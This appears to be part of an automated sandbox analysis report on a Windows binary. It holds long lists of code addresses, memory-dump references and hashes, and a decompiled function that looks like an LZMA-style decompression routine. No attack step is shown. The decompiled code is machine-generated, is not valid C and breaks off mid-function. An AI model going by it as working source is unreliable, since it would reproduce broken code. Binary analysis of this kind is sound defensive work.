                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x004068c2
                                                                                                                    0x004068bc
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x004068bc
                                                                                                                    0x00406843
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406595

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                    • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                                                                                    • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                    • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
